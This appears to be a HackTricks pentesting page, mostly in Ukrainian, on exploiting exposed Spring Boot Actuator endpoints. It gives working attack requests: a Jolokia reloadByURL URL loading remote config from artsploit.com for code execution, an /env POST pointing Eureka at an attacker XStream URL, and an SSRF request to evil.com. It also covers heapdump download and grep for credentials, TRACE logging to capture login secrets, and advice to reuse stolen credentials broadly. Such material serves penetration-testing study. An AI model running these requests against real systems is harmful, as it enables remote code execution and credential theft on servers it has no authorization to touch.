Spring Actuators

Reading time: 6 minutes

tip

Вивчайте та практикуйте AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Вивчайте та практикуйте GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Вивчайте та практикуйте Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Підтримайте HackTricks

Spring Auth Bypass

From https://raw.githubusercontent.com/Mike-n1/tips/main/SpringAuthBypass.png

Exploiting Spring Boot Actuators

Перевірте оригінальний пост за [https://www.veracode.com/blog/research/exploiting-spring-boot-actuators]

Ключові моменти:

  • Spring Boot Actuators реєструють endpoints такі як /health, /trace, /beans, /env тощо. У версіях 1–1.4 ці endpoints доступні без аутентифікації. Починаючи з версії 1.5, за замовчуванням лише /health і /info не вважаються чутливими, але розробники часто вимикають цей захист.
  • Деякі Actuator endpoints можуть розкривати чутливі дані або дозволяти шкідливі дії:
  • /dump, /trace, /logfile, /shutdown, /mappings, /env, /actuator/env, /restart, and /heapdump.
  • У Spring Boot 1.x actuators реєструються під кореневим URL, тоді як у 2.x вони знаходяться під базовим шляхом /actuator/.

Техніки експлуатації:

  1. Remote Code Execution via '/jolokia':
  • Endpoint /jolokia exposes the Jolokia Library, which allows HTTP access to MBeans.
  • Дія reloadByURL може бути експлуатована для перезавантаження конфігурацій логування з зовнішнього URL, що може призвести до blind XXE або Remote Code Execution через спеціально сформовані XML-конфігурації.
  • Example exploit URL: http://localhost:8090/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/artsploit.com!/logback.xml.
  1. Config Modification via '/env':
  • Якщо присутні Spring Cloud Libraries, endpoint /env дозволяє змінювати environmental properties.
  • Властивості можна маніпулювати для експлуатації вразливостей, наприклад XStream десеріалізаційної вразливості в Eureka serviceURL.
  • Example exploit POST request:
POST /env HTTP/1.1
Host: 127.0.0.1:8090
Content-Type: application/x-www-form-urlencoded
Content-Length: 65

eureka.client.serviceUrl.defaultZone=http://artsploit.com/n/xstream
  1. Other Useful Settings:
  • Властивості на кшталт spring.datasource.tomcat.validationQuery, spring.datasource.tomcat.url, та spring.datasource.tomcat.max-active можна змінювати для різних експлойтів, таких як SQL injection або зміна рядків підключення до БД.

Додаткова інформація:

  • A comprehensive list of default actuators can be found here.
  • Endpoint /env у Spring Boot 2.x використовує JSON формат для модифікації властивостей, але загальна концепція залишається тією самою.

Пов'язані теми:

  1. Env + H2 RCE:
  • Деталі щодо експлуатації поєднання endpoint /env та H2 database можна знайти here.
  1. SSRF on Spring Boot Through Incorrect Pathname Interpretation:
  • Обробка Spring framework матричних параметрів (;) у HTTP-шляхах може бути використана для Server-Side Request Forgery (SSRF).
  • Example exploit request:
http
GET ;@evil.com/url HTTP/1.1
Host: target.com
Connection: close

HeapDump добування секретів (облікові дані, токени, внутрішні URL)

Якщо /actuator/heapdump відкритий, зазвичай можна отримати повний JVM heap snapshot, який часто містить live-секрети (DB креденшіали, API-ключі, Basic-Auth, внутрішні service URL, Spring property maps тощо).

  • Завантаження та швидкий аналіз:
bash
wget http://target/actuator/heapdump -O heapdump
# Quick wins: look for HTTP auth and JDBC
strings -a heapdump | grep -nE 'Authorization: Basic|jdbc:|password=|spring\.datasource|eureka\.client'
# Decode any Basic credentials you find
printf %s 'RXhhbXBsZUJhc2U2NEhlcmU=' | base64 -d
  • Глибший аналіз за допомогою VisualVM і OQL:
  • Відкрийте heapdump у VisualVM, переглядайте екземпляри java.lang.String або виконуйте OQL для пошуку секретів:
select s.toString()
from java.lang.String s
where /Authorization: Basic|jdbc:|password=|spring\.datasource|eureka\.client|OriginTrackedMapPropertySource/i.test(s.toString())
  • Автоматичне витягування з JDumpSpider:
bash
java -jar JDumpSpider-*.jar heapdump

Типові цінні знахідки:

  • Spring DataSourceProperties / HikariDataSource об'єкти, які містять url, username, password.
  • OriginTrackedMapPropertySource записи, що розкривають management.endpoints.web.exposure.include, порти сервісів та вбудований Basic-Auth у URL (наприклад, Eureka defaultZone).
  • Фрагменти plain HTTP запитів/відповідей, включно з Authorization: Basic ..., що зберігаються в пам'яті.

Поради:

  • Використовуйте Spring-focused wordlist для швидкого виявлення actuator endpoint'ів (наприклад, SecLists spring-boot.txt) і завжди перевіряйте, чи також доступні /actuator/logfile, /actuator/httpexchanges, /actuator/env та /actuator/configprops.
  • Облікові дані з heapdump часто працюють для суміжних сервісів і інколи для системних користувачів (SSH), тому пробуйте їх широкомасштабно.

Зловживання Actuator loggers/logging для перехоплення облікових даних

Якщо management.endpoints.web.exposure.include дозволяє це і /actuator/loggers відкритий, ви можете динамічно підвищити рівні логування до DEBUG/TRACE для пакетів, що обробляють аутентифікацію і обробку запитів. У поєднанні з доступними логами (через /actuator/logfile або відомі шляхи логів) це може leak облікові дані, надіслані під час логін-потоків (наприклад, Basic-Auth заголовки або параметри форми).

  • Перелічіть і підвищіть чутливі логгери:
bash
# List available loggers
curl -s http://target/actuator/loggers | jq .

# Enable very verbose logs for security/web stacks (adjust as needed)
curl -s -X POST http://target/actuator/loggers/org.springframework.security \
-H 'Content-Type: application/json' -d '{"configuredLevel":"TRACE"}'
curl -s -X POST http://target/actuator/loggers/org.springframework.web \
-H 'Content-Type: application/json' -d '{"configuredLevel":"TRACE"}'
curl -s -X POST http://target/actuator/loggers/org.springframework.cloud.gateway \
-H 'Content-Type: application/json' -d '{"configuredLevel":"TRACE"}'
  • Знайдіть, куди записуються логи, і витягніть їх:
bash
# If exposed, read from Actuator directly
curl -s http://target/actuator/logfile | strings | grep -nE 'Authorization:|username=|password='

# Otherwise, query env/config to locate file path
curl -s http://target/actuator/env | jq '.propertySources[].properties | to_entries[] | select(.key|test("^logging\\.(file|path)"))'
  • Викличте трафік логіну/аутентифікації і проаналізуйте логи на наявність облікових даних. У мікросервісних налаштуваннях з gateway перед auth, увімкнення TRACE для пакетів gateway/security часто робить видимими заголовки і тіла форм. Деякі середовища навіть генерують синтетичний логін-трафік періодично, що робить збір тривіальним після підвищення verbosity логів.

Нотатки:

  • Поверніть рівні логів після завершення: POST /actuator/loggers/<logger> з { "configuredLevel": null }.
  • Якщо /actuator/httpexchanges відкритий, він також може показувати недавні метадані запитів, які можуть включати чутливі заголовки.

References

tip

Вивчайте та практикуйте AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Вивчайте та практикуйте GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Вивчайте та практикуйте Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Підтримайте HackTricks